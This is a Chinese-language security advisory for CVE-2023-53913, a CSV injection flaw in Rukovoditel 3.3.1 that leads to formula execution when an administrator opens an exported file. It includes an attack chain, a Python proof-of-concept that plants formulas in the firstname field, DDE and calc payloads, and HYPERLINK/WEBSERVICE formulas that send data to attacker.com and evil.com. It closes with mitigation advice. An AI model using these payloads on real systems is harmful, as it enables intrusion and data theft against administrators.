CVE-2023-53913 Rukovoditel CSV注入远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2023-53913

漏洞类型

CSV注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Rukovoditel

漏洞概述

CVE-2023-53913是Rukovoditel 3.3.1版本中存在的一个高危CSV注入漏洞。该漏洞允许已认证的低权限用户在firstname（名字）字段中注入恶意公式或命令。当具有更高权限的管理员将包含恶意数据的用户账户信息导出为CSV文件时，攻击者注入的公式将被Excel、WPS等电子表格软件执行，从而可能导致远程代码执行（RCE）风险。攻击者利用CSV文件格式的特性，通过在单元格中插入以等号(=)开头的公式，可以触发应用程序的公式解析功能。在某些情况下，攻击者可以使用特定格式的公式如'=calc|a!z|'来尝试执行系统命令或调用外部程序。此漏洞的CVSS评分为8.8，属于高危级别，对系统机密性、完整性和可用性均造成严重影响。由于攻击利用的是CSV导出功能，而导出操作通常是管理员的常规管理行为，因此该漏洞具有较高的隐蔽性和实际危害性。

技术细节

该漏洞的根本原因在于Rukovoditel应用在处理用户输入时未对firstname字段进行充分的输入验证和输出编码。当应用将用户数据导出为CSV格式时，直接将用户输入的原始数据写入CSV文件，而CSV格式支持以等号(=)开头的公式表达式。攻击流程如下：首先，攻击者以低权限用户身份登录Rukovoditel系统；然后，在个人资料设置中将firstname字段修改为恶意公式，如'=calc|a!z|'或'=HYPERLINK("http://attacker.com/steal?data="&A1)'；接着，当管理员进入用户管理模块并执行批量导出功能时，系统会将所有用户信息导出为CSV文件；最后，管理员在本地使用Excel或WPS打开该CSV文件时，文件中的恶意公式会被自动执行。对于旧版Excel，公式可能被用于DDE（动态数据交换）攻击；对于新版Excel，特定格式的公式仍可能用于信息窃取或进一步攻击。攻击者可以通过精心构造的公式实现命令执行、数据外传或钓鱼攻击。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标Rukovoditel系统版本，确认版本为3.3.1或更早版本

STEP 2

步骤2

初始访问：攻击者注册账户或使用已有低权限账户登录系统

STEP 3

步骤3

有效载荷注入：攻击者将恶意CSV公式（如=calc|a!z|或=HYPERLINK）写入用户个人资料的firstname字段

STEP 4

步骤4

等待触发：攻击者等待具有管理权限的用户（管理员）进行常规数据导出操作

STEP 5

步骤5

数据导出：管理员访问用户管理模块，选择导出功能将用户列表导出为CSV格式文件

STEP 6

步骤6

漏洞触发：管理员在本地计算机使用Excel、WPS或其他电子表格软件打开CSV文件，恶意公式被自动解析执行

STEP 7

步骤7

影响实现：根据公式类型，可能导致命令执行、信息窃取、重定向攻击或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2023-53913 CSV Injection PoC
# Affected: Rukovoditel <= 3.3.1
# Type: CSV Injection leading to RCE

import requests
import json

# Configuration
target_url = "http://target.com"
username = "attacker"
password = "password123"

# Step 1: Login to get session
session = requests.Session()
login_data = {
    "username": username,
    "password": password
}
login_response = session.post(f"{target_url}/index.php?module=users/login", data=login_data)

# Step 2: Update firstname with malicious CSV formula
profile_url = f"{target_url}/index.php?module=users/account"
malicious_firstname = "=calc|a!z|"  # Trigger calc.exe on Windows
# Alternative payloads:
# "=HYPERLINK("http://evil.com/steal?data="&A1)"
# "=CMD|' /c calc'!A0"
# "=WEBSERVICE("http://attacker.com/?data="&A1)"

profile_data = {
    "firstname": malicious_firstname,
    "save": "1"
}
update_response = session.post(profile_url, data=profile_data)

# Step 3: Wait for admin to export CSV
# When admin exports user data to CSV, the formula will execute
# when opened in Excel/WPS

print("PoC executed. Malicious payload injected into firstname field.")
print("Payload:", malicious_firstname)
print("Wait for admin to export CSV file and open it in spreadsheet software.")

影响范围

Rukovoditel <= 3.3.1

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 禁用或限制CSV导出功能，仅允许可信管理员使用；2) 在数据导出前对所有用户输入进行严格的输入验证，拒绝包含特殊字符的数据；3) 使用应用层防火墙规则拦截包含CSV注入特征的请求；4) 对导出的CSV文件添加安全警告标签，提醒用户不要直接双击打开；5) 建议管理员使用纯文本编辑器（如Notepad）打开CSV文件而非电子表格软件，以避免公式自动执行；6) 监控和审计用户对个人资料字段的修改行为，及时发现异常注入尝试。